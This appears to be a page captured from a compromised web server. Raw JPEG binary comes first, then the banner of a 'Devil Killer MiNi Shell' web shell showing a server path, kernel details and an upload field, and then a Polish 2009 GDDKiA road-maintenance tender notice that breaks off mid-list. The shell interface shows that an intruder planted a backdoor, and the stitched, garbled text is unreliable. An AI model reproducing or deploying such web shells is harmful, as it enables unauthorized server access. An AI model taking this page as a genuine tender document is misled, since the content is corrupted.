JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090318/66828-N-2009.html

<p class="kh_header"><b>Katowice: Roboty drogowe i utrzymaniowe na terenie administrowanym przez GDDKiA Oddział w Katowicach Rejon Wysoki Brzeg</b><br>
<b>Numer ogłoszenia: 66828 - 2009; data zamieszczenia: 18.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Katowicach , ul. Myśliwska 5, 40-017 Katowice, woj. śląskie, tel. 032 2586281, faks 032 2598710.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gddkia.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty drogowe i utrzymaniowe na terenie administrowanym przez GDDKiA Oddział w Katowicach Rejon Wysoki Brzeg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Grupa robót nr 1 : UTRZYMANIE NAWIERZCHNI 	
	  
Lp.	Opis robót
1	Remont nawierzchni mieszankami mineralno-asfaltowymi na gorąco
	a) remont cząstkowy masą z Wytwórni Mas Bitumicznych
	    - przy grubości do 4cm
	    - dodatek za każdy dalszy 1cm pow. 4cm
	b) remont cząstkowy masą z recyklera
	    - przy grubości do 4cm
	    - dodatek za każdy dalszy 1cm pow. 4cm
2	Remont nawierzchni mieszankami mineralno-asfaltowymi na zimno
	    - remont cząstkowy przy grubości do 4cm
	    - dodatek za każdy dalszy 1cm pow. 4cm
3	Remont nawierzchni emulsjami asfaltowymi i grysami
	 - remont cząstkowy przy głębokości wyboi do 1,5cm
	 - dodatek za każde dalsze 0,5cm głębokości wyboju
4	Likwidacja spękań poprzecznych
5	Frezowanie powierzchniowe nawierzchni dla wyrównania sfałdowań
	 - przy grubości frezowania do 4cm wraz z wywozem na odl. do 10km
	 - za każdy następny 1cm frezowania powyżej 4cm wraz z wywozem na odl. do 10km
	 - oczyszczanie mechaniczne nawierzchni ulepszonej z bitumu
6	Nawierzchnie z betonu asfaltowego
	( nakładki z mas bitumicznych BA )
	 - przy grubości frezowania do 4cm wraz z wywozem na odl. do 10km
	 - za każdy następny 1cm frezowania powyżej 4cm wraz z wywozem na odl. do 10km
	 - oczyszczanie mechaniczne nawierzchni ulepszonej z bitumu
	 - skropienie nawierzchni asfaltem
	 - warstwa ścieralna o gr.3cm
	 - dodatek do warstwy ścieralnej za każdy 1cm powyżej 3 cm gr.
	 - warstwa wiążąca o gr. 4cm
	 - dodatek za każdy do warstwy wiążącej za każdy 1cm powyżej 4 cm gr.
7	Nakładki bitumiczne z SMA oraz z mieszanek o nieciągłym uziarnieniu
	 - przy grubości frezowania do 4cm wraz z wywozem na odl. do 10km
	 - za każdy następny 1cm frezowania powyżej 4cm wraz z wywozem na odl. do 10km
	 - oczyszczanie mechaniczne nawierzchni ulepszonej z bitumu
	 - skropienie nawierzchni asfaltem
	a) mastyks grysowy SMA
	 - warstwa ścieralna o gr.3cm
	 - dodatek do warstwy ścieralnej za każdy 1cm powyżej 3 cm gr.
	 - warstwa wiążąca o gr. 4cm
	 - dodatek za każdy do warstwy wiążącej za każdy 1cm powyżej 4 cm gr.
	b) mieszanka o nieciągłym uziarnieniu do cienkich warstw
	 - warstwa ścieralna o gr. do 3cm
	
2.Grupa robót nr 2 : UTRZYMANIE POBOCZY	
	                                            
Lp.	Opis
1	Remont i uzupełnienie ubytków poboczy
	 - naprawy poboczy z tłucznia - gr.do 10cm
	 - naprawy poboczy destruktem - materiałem po frezowaniu mas bitumicznych 
   ( frezem ) - gr.do 10cm
2	Ścięcie zawyżonych poboczy
	 - wykonywane mechanicznie - ścinanie o gr.10cm
	 - wykonywane mechanicznie - za każde dalsze 5cm ponad 10cm grubości ścinania
	 - wykonywane ręcznie - ścinanie o grubości 10cm
	 - wykonywane ręcznie - za każde dalsze 5cm ponad 10cm grubości ścinania
3	Naprawa rozmytych skarp
	 - Wywiezienie ziemi i szlamu samochodami samowyładowczymi na średnią odległość do 10km
	 - Wywiezienie ziemi i szlamu samochodami samowyładowczymi - dodatek za każdy następny 1km ponad 1km
	 - Opłata za wysypisko śmieci
	 - Przewóz samochodem samowyładowczym materiału do wbudowania w skarpę nasypu (materiał zamawiającego) transport na odl. 10km
	 - Przewóz samochodem samowyładowczym materialu do wbudowania w skarpę nasypu -za każdy rozpoczęty 1km ponad 10km
	 - Ręczne formowanie nasypów z ziemi dowożonej samochodami samowyładowczymi
	 - Zagęszczenie nasypów ubijakami mechanicznymi,
	 - Plantowanie, obrobienie na czysto skarp i korony nasypów 
	 - Humusowanie skarp z obsianiem warstwy humusu grubości 5cm
	 - Humusowanie skarp z obsianiem warstwy humusu - dodatek za każde dalsze 5cm humusu (ponad 5cm)
	
3.Grupa robót nr 3 : UTRZYMANIE ODWODNIENIA DROGI	
	 
Lp.	Opis
1	Renowacja i pogłębienie istniejących rowów
	 - oczyszczenie rowu z namułu wraz z profilowaniem dla średniej gł.namułu 30cm dna i skarp rowu i wywozem nieczystości na średnią odległość 10 km 
	- odtworzenie przebiegu rowów przydrożnych ( wykonanie ) wraz z wywozem  
   nadmiaru ziemi na odległość do 10 km
	 - umocnienie skarp rowów płytami ażurowymi o wymiarach 40x60cm
	 - umocnienie skarp rowów płytami chodnikowymi o wymiarach 50x50x7cm
	 - umocnienie dna rowu płytami chodnikowymi 50x50x7cm
	 - umocnienie dna rowu prefabrykowanymi korytkami betonowymi 
2	Oczyszczenie otwartych ścieków betonowych , kamiennych i przykrawężnikowych
3	Wykonanie , remont i regulacja studni rewizyjnych , przykanalików i wpustów deszczowych
	Wykonanie nowych elementów :
	 - studnia rewizyjna o śr.prefabrykowanych kręgów betonowych 1000 mm i gł. 3 m w nawierzchni jezdni
	 - studnia rewizyjna o śr.prefabrykowanych kręgów betonowych 1200 mm i gł. 3 m w nawierzchni jezdni
	 - studnia rewizyjna o śr.prefabrykowanych kręgów betonowych 1500 mm i gł. 3 m w nawierzchni jezdni
	 - wykonanie przykanalika z PCV o średnicy :
	a) 100 mm
	b) 150 mm
	 - studzienki deszczowe z osadnikiem bez syfonu ( kratki ściekowe drogowe ) w jezdni bitumicznej
	 - studzienki deszczowe z osadnikiem bez syfonu ( kratki ściekowe drogowe ) w poboczu drogi ( w zieleńcu )
	Regulacja i remont istniejących elementów :
	 - wymiana włazów kanałowych studni rewizyjnych
	 - wymiana wpustów ściekowych 
	 - regulacja włazów kanałowych
	 - regulacja kratek ściekowych
4	Udrożnienie kanalizacji deszczowej
	Czyszczenie kanalizacji deszczowej z rur betonowych
	 - oczyszczenie z namułu kanalizacji deszczowej o śr. 0,4 m
	 - oczyszczenie z namułu kanalizacji deszczowej o śr. 0,6 m
	 - oczyszczenie z namułu kanalizacji deszczowej o śr. 0,8 m
	 - oczyszczenie z namułu kanalizacji deszczowej o śr. 1,0 m
	Czyszczenie kratek ściekowych - wraz z wywozem nieczystości na odl. do 10 km i opłatą za wysypisko odpadow
	Czyszczenie studni rewizyjnych - wraz z wywozem nieczystości na odl. do 10 km i opłatą za wysypisko odpadów
	Czyszczenie przykanalików z kratek ściekowych
	
4.Grupa robót nr 4 : Chodniki	
	 
Lp.	Opis
	Ułożenie i wymiana krawężników i obrzeży chodnikowych
1	Ułożenie i wymiana krawężników drogowych :
	 - rozbiórka istniejących krawężników drogowych ( bez względu na wymiar ) wraz z wywozem na odległość 10 km
	 - prefabrykowany krawężnik drogowy 15x30x100cm 
	 - prefabrykowany krawężnik drogowy 20x30x100cm 
2	Ułożenie i wymiana obrzeży chodnikowych
	 - rozbiórka istniejących obrzeży chodnikowych ( bez względu na wymiar ) wraz z wywozem na odległość 10 km
	 - obrzeża chodnikowe na podsypce cem. - piaskowej owym.8x30x100 cm
3	Ułożenie i wymiana nawierzchni chodnika
	 - rozbiórka istmiejącej nawierzchni chodnika i podsypki ( bez względu na   konstrukcję )   wraz z wywozem na odległość 10 km
	 - nawierzchnia chodnika z prefabrykowanej kostki betonowej o gr. 8 cm wraz z podsypką cem.-piaskową ( zał.10 % kostki kolorowej )
	 - nawierzchnia chodnika z prefabrykowanej kostki betonowej o gr. 6 cm wraz z podsypką cem.-piaskową ( zał.20 % kostki kolorowej )
	 - nawierzchnia chodnika z chodnikowych płytek betonowych o wym. 50x50x7cm
   wraz z podsypką cem.-piaskową
	- nawierzchnia chodnika z chodnikowych płytek betonowych o wym. 35x35x5cm
   wraz z podsypką cem.-piaskową
	
5.Grupa robót nr 5 : OZNAKOWANIE	
	 
Lp.	Opis
1	Ustawienie kompletnych znaków drogowych ( tarcza + słupek )
	znaki zakazu, nakazu, ostrzegawcze i informacyjne o powierzchni do 0,3m2 + słupek stalowy średnicy 70mm
	znaki zakazu, nakazu, ostrzegawcze i informacyjne o powierzchni ponad 0,3m2 + słupek stalowy średnicy 70mm
2	Ustawienie kompletnych tablic drogowskazowych
	 - wykonanie i ustawienie konstrukcji nośnej
	 - zamocowanie tablicy drogowskazowej z folii spełniającej wymogi jak 
   dla folii II generacji
3	Wymiana tarcz znaków pionowych ( bez słupka )
	 - znaki zakazu, nakazu, ostrzegawcze i informacyjne o powierzchni do 0,3m2
	 - znaki zakazu, nakazu, ostrzegawcze i informacyjne o powierzchni ponad 0,3m2
4	Wymiana słupków i podpór oznakowania pionowego
	 - Słupki do znaków drogowych z rur stalowych o średnicy 70mm
	 - Słupki do znaków drogowych z rur stalowych o średnicy 100mm
	 - konstrukcja nośna pod oznakowanie drogowskazowe
5	Ustawienie i wymiana pachołków drogowych 
	( słupków prowadzących I krawędziowych )
	 - typ U-1a
	 - typ U-1b, U-2
6	Wymiana i montaż elementów na pachołkach
	 - tabliczki z kilometrażem drogi 
	 - tabliczki z numerem drogi U-1f
	 - piktogramów kilometrowych U-7
	 - piktogramów hektometrowych U-8
7	Wymiana i montaż elementów odblaskowych na poręczach
	 - punktowy element odblaskowy U-1c
	
6.Grupa robót nr 6 : BEZPIECZEŃSTWO	
	 
Lp.	Opis
1	Wykonanie , kompleksowa wymiana barier stalowych
	 a) demontaż istniejących barier stalowych ( pojedyńczych ) wraz z  
     odwozem na odległość do 10km 
	 b)  demontaż istniejących barier stalowych ( podwójnych ) wraz z  
     odwozem na odległość do 10km 
	 c) ustawienie nowych barier stalowych
	 - stalowe bariery ochronne o masie do 24kg na 1mb - bariery pojedyńcze
	 - stalowe bariery ochronne o masie do 28kg na 1mb - bariery podwójne
	 - stalowe bariery ochronne o masie do 39kg na 1mb - bariery pojedyńcze
	 - stalowe bariery ochronne o masie do 49kg na 1mb - bariery podwójne
2	Wykonanie, kompleksowa wymiana barier betonowych
	 a) demontaż istniejących barier ( zapór ) betonowych wraz z odwozem na odległość do 10km 
	 b) ustawienie nowych barier ( zapór ) betonowych stałych, przestwanych, np. typu NEW YERSEJ
	Demontaż i montaż latarni oświetlenia ulicznego.
3	a) demontaż latarni oświetlenia ulicznego
	b) montaż latarni oświetlenia ulicznego
4	 - latarnie jednowysięgnikowe
5	 - latarnie dwuwysięgnikowe
6	Ustawianie ogrodzenia typu autostradowego
7	Rozbiórka ogrodzenia typu autostradowego
8	Budowa bramy z siatki i kształtowików stalowych
9	Rozbiórka bram z siatki i kształtowników stalowych
	
7.Grupa robót nr 7 : ESTETYKA DROGI	
	 
Lp.	Opis
1	Mycie znaków pionowych ( ręczne )
	Mycie drogowych znaków pionowych 
	Mycie tablic drogowskazowych
2	Mycie pachołków , barier i elementów odblaskowych ( ręczne )
	 - mycie pachołków
	 - mycie energochłonnych barier stalowych
	 - mycie elementów odblaskowych na barierach energochłonnych
3	Malowanie podpór oznakowania pionowego
4	Pielęgnacja drzew
	Podcinanie gałęzi i konarów drzew wraz z wywozem na odległość do 10km
5	Wycinka krzewów , samosiejek
	 - krzewy wraz z wywozem na odległość do 10km
	 - samosiejki wraz z wywozem na odległość do 10km
6	Zbieranie śmieci z pasa drogowego wraz z wywozem na odl. do 10km i opłatą za wysypisko śmieci 
7	Ręczne lub mechaniczne czyszczenie jezdni,poboczy,chodników
	 - ręczne wraz z wywozem na odległość do 10km i opłatą za wysypisko odpadów
	 - mechaniczne wraz z wywozem na odległość do 10km i opłatą za wysypisko odpadów
	 - opłata za wysypisko śmieci
8	Koszenie traw 
	 - koszenie ręczne traw za pomocą kosiarek spalinowych pod zanakami , barierami  energochłonnymi , ze skarp i poboczy , wraz z wygrabieniem i zebraniem w stosy i wywozem na odl. do 10km
	 - mechaniczne z poboczy , skarp,przeciwskarp i pasa dzielącego , wraz z  
   wygrabieniem i zebraniem w stosy i wywozem na odl. do 10km
	
8.Grupa robót nr 8 : Wycinanie drzew	
	 
Lp.	Opis
1	Wycinka drzew
	Ścinanie piłą mech. drzew o średnicy 10-15cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km
	Ścinanie piłą mech. drzew o średnicy 16-25cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km
	Ścinanie piłą mech.  drzew o średnicy 26-35cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km
	Ścinanie piłą mech.  drzew o średnicy 36-45cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km
	Ścinanie piłą mech. drzew o średnicy 46-55cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km
	Ścinanie piłą mech. drzew o średnicy 56-65cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km
	Ścinanie piłą mech.  drzew o średnicy 66-75cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km
	
9.Grupa robót nr 9 : Realizacja robót za pomocą wysoce specjalistycznego sprzętu typu np. Unimog
	 	
	 - usługi świadczone sprzętem zamawiającego - samochód wielozadaniowy typu UNIMOG
	 - usługi świadczone sprzętem wykonawcy - samochód wielozadaniowy typu UNIMOG
	 - mechaniczne koszenie traw z poboczy, skarp, przeciwskarp i pasa dzielącego, wraz z wygrabieniem i zebraniem w stosy i wywozem na odl. do 10km
	 - Mechaniczne prześwietlanie drzew i krzewów
	 - Oczyszczenie mechaniczne nawierzchni z wywozem na odl. do 10km i opłatą za wysypisko śmieci
	 - Mechaniczne czyszczenie rowów przydrożnych
	 - Mechaniczne mycie znaków i pachołków drogowych
	 - Odśnieżanie i zwlczanie gołoledzi
	
10.Grupa robót  nr 10 : Całodobowy patrol autostrady A-4	
	 
	 - całodobowy patrol autostrady A-4.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.22.00.00-5, 45.23.30.00-9, 45.11.10.00-8, 45.22.30.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości:
200 000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 7.	WARUNKI UDZIAŁU W POSTĘPOWANIU I SPOSÓB DOKONYWANIA OCENY ICH SPEŁNIANIA

7.1 W postępowaniu mogą brać udziału Wykonawcy niepodlegający wykluczeniu na podstawie art. 24 ustawy Pzp oraz spełniający niżej określone warunki udziału w postępowaniu.
 
7.2 Warunki udziału w postępowaniu, określone w oparciu o art. 22 ust. 1 pkt 1)-3) 
  ustawy Pzp

7.2.1 Potencjał ekonomiczno-finansowy 
Wykonawca musi wykazać:
1)	 przychód za ostatnie trzy lata obrotowe , tzn. za lata 2006, 2007 i 2008  (na podstawie /Rachunku zysków i strat/ pozycja /Przychód netto ze sprzedaży produktów, towarów i materiałów/ lub Przychód netto ze sprzedaży i zrównane z nimi/) w wysokości nie mniejszej niż 9 mln PLN

2)	 posiadanie środków finansowych  i/lub zdolności kredytowej w wysokości nie mniejszej niż 1,5 mln PLN 

7.2.2 Potencjał kadrowy 
Wykonawca musi mieć do dyspozycji osoby legitymujące się doświadczeniem i kwalifikacjami odpowiednimi do funkcji, jakie zostaną im powierzone lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia tych osób. Wykonawca przedstawi w ofercie osoby, na każdą funkcję wymienioną  poniżej, które spełniają następujące wymagania: 

1. Stanowisko: Kierownik Budowy; Wymagana liczba osób: 1; Min. doświadczenie jako kierownik dla robót na drogach krajowych: 3 lata.
2. Stanowisko: Kierownik Robót; Wymagana liczba osób: 1; Min. doświadczenie jako kierownik dla robót na drogach krajowych: 2 lata.
  
Uwaga :
Przez minimalne doświadczenie zawodowe dla stanowiska, dla którego wymagane  są uprawnienia budowlane  rozumie się lata czynne zawodowo od daty uzyskania uprawnień budowlanych oraz lata przepracowane na odpowiednich stanowiskach kierowniczych.


Kierownik budowy - wykonawca musi wykazać , że osoba proponowana na to stanowisko jako kierownik budowy zrealizował ( rozpoczął i zakończył ) w okresie ostatnich 5 lat, min. po jednym zadaniu zrealizowanym na drogach min. klasy G dla każdej grupy robót objętej zamówieniem. 
Kierownik robót - wykonawca musi wykazać, że osoba proponowana na to stanowisko zrealizowała (rozpoczęła i zakończyła ) w okresie ostatnich 2 lat , min. po jednym zadaniu zrealizowanym na drogach min. klasy G dla każdej grupy robót objętej zamówieniem. 
Osoby wskazane na stanowisku Kierownika budowy i kierownika robót drogowych  winny posiadać uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów.

7.2.3 Potencjał techniczny
Wykonawca musi dysponować narzędziami i urządzeniami oraz środkami transportu, wymienionymi w poniższej tabeli lub przedstawić pisemne zobowiązanie innych podmiotów do ich udostępnienia. 


Lp.	Wyszczególnienie ( parametry )/	Min. Liczba jednostek
1.	Frezarka do nawierzchni drogowych o szerokości ścinania min. 1,0 m	/1
2.	Rozściełacz mas bitumicznych o szer. rozkładania nawierzchni do 4,5 m	/1
3.	J.w. lecz o szerokości rozkładania nawierzchni do 9,0 m	/1
4.	Walce statyczne 0,9 - 9,0 Mg	/5
5.	Recyklery do przetwarzania ,,destruktu,,- frezu dla wykonania remontu cząstkowego nawierzchni bitumicznych	/3
6.	Remonter do powierzchniowego utrwalania nawierzchni grysami	/1
7.	Zamiatarki do czyszczenia mechanicznego jezdni i warstw bitumicznych	/2
8.	Zwyżka montażowa do 24 metrów	/1
9.	Wielozadaniowy samochód specjalistyczny typu np. ,,UNIMOG,, wraz z osprzętem (kosiarka rolkowa na wysięgniku, pogłębiarka do rowów, sekator do obcinania gałęzi)	/2
10.	Samochody ciężarowe o ład. 5,0 - 25 Mg	/12
11.	Koparko - ładowarki	/4
12.	Młoty pneumatyczne w zestawie z kompresorem	/3
13.	Agregaty prądotwórcze	/3
14.	Piły spalinowe do cięcia nawierzchni drogowych	/5
15.	Kafary do wbijania barier energochłonnych	/2
16.	Zagęszczarki płytowe do zagęszczania podłoża	/3
17.	Spalinowe ubijarki ,,stopowe,, do zagęszczania nawierzchni	/3
18.	Piły spalinowe do cięcia drewna	/4
19.	Ręczne kosiarki spalinowe do koszenia traw	/8
20.	Przyczepki sygnalizacyjne dla robót drogowych wg wymagań zawartych w odrębnych przepisach	/6

Zaplecze techniczne ( dyspozycyjność )
1.	Z uwagi na charakter zamówienia ( zapewnienie bezpieczeństwa w ruchu drogowym i jego ciągłości ) Wykonawca musi wykazać , że lokalizacja baz sprzętu i ludzi gwarantuje podjęcie działań związanych z określonym w SIWZ ,,trybem awaryjnym,, usunięcia usterek ( awarii ) , prac po kolizjach i wypadkach i innych zdarzeniach losowych w czasie nie dłuższym niż 1 godzina od czasu zgłoszenia przez Zamawiającego.
2.	W związku z powyższym Wykonawca winien prowadzić 24 godzinny dyżur w celu realizacji postanowień zawartych w ust. 1.
            3.  Baza sprzętu winna posiadać co najmniej dwa numery telefonów stacjonarnych wraz  z ,, faksem ,,.

7.2.4 Doświadczenie 
Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (zakończył) co najmniej 2 zadania o profilu identycznym z przedmiotem zamówienia o wartości łącznej nie niższej niż 15,0 mln zł.
     
7.3	Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne/konsorcja)
W przypadku tych Wykonawców, żaden z nich nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 i ust. 2 ustawy Pzp, natomiast warunki określone w pkt 7.2 IDW muszą spełniać łącznie.

7.4		Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie art. 24 ustawy Pzp. Podstawą oceny spełniania warunków będą w szczególności wymagane dokumenty i oświadczenia, o których mowa w pkt 8 IDW, na zasadzie spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 8.	DOKUMENTY I OŚWIADCZENIA WYMAGANE DLA POTWIERDZENIA SPEŁNIANIA PRZEZ WYKONAWCÓW WARUNKÓW

8.1.	Dla potwierdzenia spełnienia warunków, określonych w art. 24 ust. 1 pkt 1)-9) ustawy Pzp, Wykonawcy powinni przedłożyć niżej wymienione dokumenty: 

8.1.1.	Oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodne z treścią Formularza 3.1.

8.1.2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

8.1.3.	Aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt od 4 do 8 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

8.1.4.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
